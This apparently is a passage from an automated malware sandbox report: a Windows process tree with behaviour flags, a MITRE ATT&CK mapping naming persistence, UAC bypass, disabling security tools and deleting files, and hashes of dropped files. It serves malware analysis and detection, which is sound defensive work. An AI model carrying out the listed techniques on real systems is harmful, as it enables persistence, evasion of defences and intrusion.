C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:11508
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:18500
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:18456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 22864 -ip 228641⤵PID:6680
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD56e29d94e2cf9948c4c4b8edd2aa0c3a3
SHA132028e5d7ee035d0ee551cca37f3481a56c847bf
SHA256df37ba551185835d135997f0e28890f9c3221a91e788b8da7cc2a0117d1a6cca
SHA5126ec229f60585bb699727a6165c1bfc5abeb4e865d844b9932319786c1a1fd1d1ba5534d225b4ee73d7c13e4aea499376ecfcbd8366ef5eaae84daa61743a9de8
-
Filesize
684B
MD53c98cb19cf19f7cb9b2902e8412b315f
SHA15a24bfe0d90992ea238284967b4722f38ee17786
SHA256030eb5c5d350633728b39e769c2752113823b84a9977ccac2c148ef395a1a1bd
SHA512e7632b45a02cd8a9e9fe39f33a942be70c53f074fe77e8ef38a6595c6c2a301a4b90c07f1281c4d3b70050b64079cdffbbc9658a1efc51a372303ac81d281f53
-
Filesize
12KB
MD5f9f8e4f62b76a22c5bc826c6eeb82273
SHA12c3575b73bfd583ec0205353f3cfe9a7c8391201
SHA256a2c357b2fbad246aee09b6971b6d05c9db4738a4b2189ae21dc62f41bb7eafed
SHA51223a2f1423f0d80c35edeb8179444b18ebd4b1c93b74dc5c47e4aa8d42f5f5f91ee365b055c3bb5f19c80b5521d4f806f74055dc0c437328c9afbc58b25fd9cc2